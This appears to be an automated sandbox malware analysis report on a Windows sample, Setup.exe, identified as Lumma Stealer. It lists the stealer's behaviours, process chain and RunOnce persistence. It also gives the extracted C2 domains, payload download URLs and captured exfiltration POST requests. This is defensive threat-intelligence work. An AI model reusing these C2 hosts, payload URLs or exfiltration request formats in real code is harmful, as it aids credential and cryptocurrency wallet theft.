Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1557280
MD5:0bf89e05c575d4bcdcdadb17c7517c29
SHA1:1040de2dca7b63045e6f201b62ff782154e2693c
SHA256:8ce1cde3bd1fa2945af8e03459775a87dba7275c17401ab19e525b3238609f6b

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Msiexec Initiated Connection
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64_ra
  • Setup.exe (PID: 6216 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 0BF89E05C575D4BCDCDADB17C7517C29)
    • choice.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\choice.exe MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
      • conhost.exe (PID: 6412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7084 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
        • 7LUEA3.pif (PID: 6400 cmdline: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx" MD5: 3F58A517F1F4796225137E7659AD2ADB)
          • InstallUtil.exe (PID: 3760 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
          • InstallUtil.exe (PID: 980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
          • InstallUtil.exe (PID: 2852 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["sliperyedhby.icu", "faintbl0w.sbs", "300snails.sbs", "thicktoys.sbs", "3xc1aimbl0w.sbs"], "Build id": "tLYMe5--222new"}
Source: Setup.exe, Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Author: unknown, Strings:
  • 0x2445e0:$a1: killself.bat
  • 0x244608:$a1: killself.bat
  • 0x24266c:$a2: rutserv.exe
  • 0x51d47c:$a2: rutserv.exe
  • 0x242690:$a3: rfusclient.exe
  • 0x51d450:$a3: rfusclient.exe
  • 0x242c48:$a4: install.log
  • 0x51d4b8:$a5: Unable to create Agent's path.
Source: sslproxydump.pcap, Rule: JoeSecurity_LummaCStealer_3, Description: Yara detected LummaC Stealer, Author: Joe Security
Source: 00000000.00000000.1186904367.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Author: unknown, Strings:
    • 0x2441e0:$a1: killself.bat
    • 0x244208:$a1: killself.bat
    • 0x24226c:$a2: rutserv.exe
    • 0x51d07c:$a2: rutserv.exe
    • 0x242290:$a3: rfusclient.exe
    • 0x51d050:$a3: rfusclient.exe
    • 0x242848:$a4: install.log
    • 0x51d0b8:$a5: Unable to create Agent's path.
Source: 00000000.00000002.1205380161.00000000037EB000.00000004.00000020.00020000.00000000.sdmp, Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Author: unknown, Strings:
    • 0x244600:$a1: killself.bat
    • 0x244628:$a1: killself.bat
    • 0x24268c:$a2: rutserv.exe
    • 0x51d49c:$a2: rutserv.exe
    • 0x2426b0:$a3: rfusclient.exe
    • 0x51d470:$a3: rfusclient.exe
    • 0x242c68:$a4: install.log
    • 0x51d4d8:$a5: Unable to create Agent's path.
Source: Process Memory Space: msiexec.exe PID: 7084, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: Process Memory Space: msiexec.exe PID: 7084, Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Author: Joe Security
Source: Process Memory Space: 7LUEA3.pif PID: 6400, Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Author: Joe Security
Source: 0.0.Setup.exe.8d0000.0.unpack, Rule: Windows_Trojan_Remotemanipulator_9ec52153, Description: unknown, Author: unknown, Strings:
          • 0x2445e0:$a1: killself.bat
          • 0x244608:$a1: killself.bat
          • 0x24266c:$a2: rutserv.exe
          • 0x51d47c:$a2: rutserv.exe
          • 0x242690:$a3: rfusclient.exe
          • 0x51d450:$a3: rfusclient.exe
          • 0x242c48:$a4: install.log
          • 0x51d4b8:$a5: Unable to create Agent's path.

          System Summary

          Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\dfbffdd\AutoIt3.exe" C:\dfbffdd\cbdaghf.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\7LUEA3.pif, ProcessId: 6400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\cbdaghf
          Source: Process started, Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx", CommandLine: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\7LUEA3.pif, NewProcessName: C:\Users\user\AppData\Roaming\7LUEA3.pif, OriginalFileName: C:\Users\user\AppData\Roaming\7LUEA3.pif, ParentCommandLine: C:\Windows\SysWOW64\msiexec.exe, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 7084, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\7LUEA3.pif" "C:\Users\user\AppData\Roaming\SPL3UE.xlsx", ProcessId: 6400, ProcessName: 7LUEA3.pif
          Source: Network Connection, Author: frack113: Data: DestinationIp: 172.67.131.254, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7084, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49704
          Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
          2024-11-18T00:15:22.667750+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49704 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:24.184664+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49706 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:25.926360+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49707 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:27.372592+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49708 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:28.840912+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49709 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:30.463927+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49710 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:31.771417+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49711 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:33.112356+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49712 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:34.414146+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49713 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:35.490437+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49714 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:36.680327+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49715 | 172.67.185.54 | 443 | TCP
          2024-11-18T00:15:38.963659+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49716 | 172.67.185.54 | 443 | TCP
          2024-11-18T00:15:43.503073+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.16 | 49717 | 172.67.185.54 | 443 | TCP
          2024-11-18T00:15:23.279515+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49704 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:24.725081+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49706 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:36.027674+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.16 | 49714 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:23.279515+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.16 | 49704 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:24.725081+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.16 | 49706 | 172.67.131.254 | 443 | TCP
          2024-11-18T00:15:32.288914+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49711 | 172.67.131.254 | 443 | TCP

          AV Detection

          Source: https://cdn1.pixel-story.shop/ldr_cp_pa05c5df6HOMEDRIVE=C:HOMEPATH=, Avira URL Cloud: Label: malware
          Source: https://cdn1.pixel-story.shop/runcl.bin, Avira URL Cloud: Label: malware
          Source: https://cdn1.pixel-story.shop/clp_pa.32n, Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\cbaxoydi, Avira: detection malicious, Label: HEUR/AGEN.1316118
          Source: 5.2.msiexec.exe.2e0000.0.unpack, Malware Configuration Extractor: LummaC {"C2 url": ["sliperyedhby.icu", "faintbl0w.sbs", "300snails.sbs", "thicktoys.sbs", "3xc1aimbl0w.sbs"], "Build id": "tLYMe5--222new"}
          Source: C:\Users\user\AppData\Local\Temp\cbaxoydi, ReversingLabs: Detection: 65%
          Source: Setup.exe, ReversingLabs: Detection: 29%
          Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.7% probability
          Source: C:\Users\user\AppData\Local\Temp\cbaxoydi, Joe Sandbox ML: detected
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: faintbl0w.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: 300snails.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: 3xc1aimbl0w.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: thicktoys.sbs
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: sliperyedhby.icu
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: lid=%s&j=%s&ver=4.0
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: TeslaBrowser/5.5
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: - Screen Resoluton:
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: - Physical Installed Memory:
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: Workgroup: -
          Source: 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, String decryptor: tLYMe5--222new
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 5_2_002F3DD8 CryptUnprotectData,5_2_002F3DD8
          Source: Setup.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49704 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49706 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49707 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49708 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49709 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49710 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49712 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49713 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.131.254:443 -> 192.168.2.16:49714 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49715 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49716 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 172.67.185.54:443 -> 192.168.2.16:49717 version: TLS 1.2
          Source: Setup.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: tapiperf.pdb source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: tapiperf.pdbGCTL source: choice.exe, 00000002.00000002.1281913157.0000000005C60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1723210183.0000000000338000.00000008.00000001.01000000.00000000.sdmp, cbaxoydi.2.dr
          Source: Binary string: wntdll.pdbUGP source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Setup.exe, 00000000.00000002.1210135833.0000000004359000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1213765321.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000002.1716809720.0000000009A94000.00000004.00001000.00020000.00000000.sdmp, 7LUEA3.pif, 0000000C.00000003.1618543385.00000000098F4000.00000004.00001000.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 5_2_0619855F FindFirstFileExW,5_2_0619855F
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pif, Code function: 12_2_015447DD FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,12_2_015447DD
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pif, Code function: 12_2_0154210D GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,12_2_0154210D
          Source: C:\Users\user\AppData\Roaming\7LUEA3.pif, Code function: 12_2_015448E5 FindFirstFileA,GetLastError,12_2_015448E5

          Networking

          Source: Network traffic, Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.16:49711 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.16:49704 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49704 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49714 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.16:49706 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.16:49706 -> 172.67.131.254:443
          Source: Malware configuration extractor, URLs: sliperyedhby.icu
          Source: Malware configuration extractor, URLs: faintbl0w.sbs
          Source: Malware configuration extractor, URLs: 300snails.sbs
          Source: Malware configuration extractor, URLs: thicktoys.sbs
          Source: Malware configuration extractor, URLs: 3xc1aimbl0w.sbs
          Source: global traffic, TCP traffic: 192.168.2.16:49719 -> 62.60.234.80:1466
          Source: Joe Sandbox View, IP Address: 104.102.49.254 104.102.49.254
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49709 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49713 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49706 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49710 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 172.67.185.54:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 172.67.185.54:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49708 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49712 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49714 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49704 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49711 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49707 -> 172.67.131.254:443
          Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 172.67.185.54:443
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 80 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ZWV2Y3KCN3COQ12661G | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12851 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4CWKL50BXAXU | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15044 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WQY78TW6YBE83BZ74EO | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20429 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=HA08J9ZOLZ5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 5419 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=MUISZHMAEL50RMO2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 5473 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=Z0N24YS7X | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1150 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VS4N0X5BF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1066 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 115 | Host: sliperyedhby.icu
          Source: global traffic, HTTP traffic detected: GET /ldr_cp_pa HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: cdn1.pixel-story.shop
          Source: global traffic, HTTP traffic detected: GET /runcl.bin HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) | Host: cdn1.pixel-story.shop
          Source: global trafficHTTP traffic detected: GET /clp_pa.32 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Host: cdn1.pixel-story.shop
          Source: unknownTCP traffic detected without corresponding DNS query: 62.60.234.80
          Source: unknown
          UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic
          HTTP traffic detected: GET /profiles/76561198043764602 HTTP/1.1
            Host: steamcommunity.com
            User-Agent: Go-http-client/1.1
            Accept-Encoding: gzip
          Source: global traffic
          DNS traffic detected: DNS query: sliperyedhby.icu
          Source: global traffic
          DNS traffic detected: DNS query: cdn1.pixel-story.shop
          Source: global traffic
          DNS traffic detected: DNS query: steamcommunity.com
          Source: unknown
          HTTP traffic detected: POST /api HTTP/1.1
            Connection: Keep-Alive
            Content-Type: application/x-www-form-urlencoded
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
            Content-Length: 8
            Host: sliperyedhby.icu
          Source: msiexec.exe, 00000005.00000002.1723397884.0000000002FBA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/ldr_cp_paKit/537.36
          Source: msiexec.exe, 00000005.00000003.1582191499.0000000003520000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1726455860.0000000003595000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1581798119.0000000003594000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.1725033822.000000000352E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/runcl.bin
          Source: msiexec.exe, 00000005.00000002.1726455860.0000000003595000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1581798119.0000000003594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn1.pixel-story.shop/runcl.binp
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: msiexec.exe, 00000005.00000003.1312993208.000000000653A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.000000000189E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=BqN7WqGLHNiU&l
          Source: InstallUtil.exe, 0000000F.00000002.2492246626.00000000018AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=1Zpka7DM_TWk&l=english
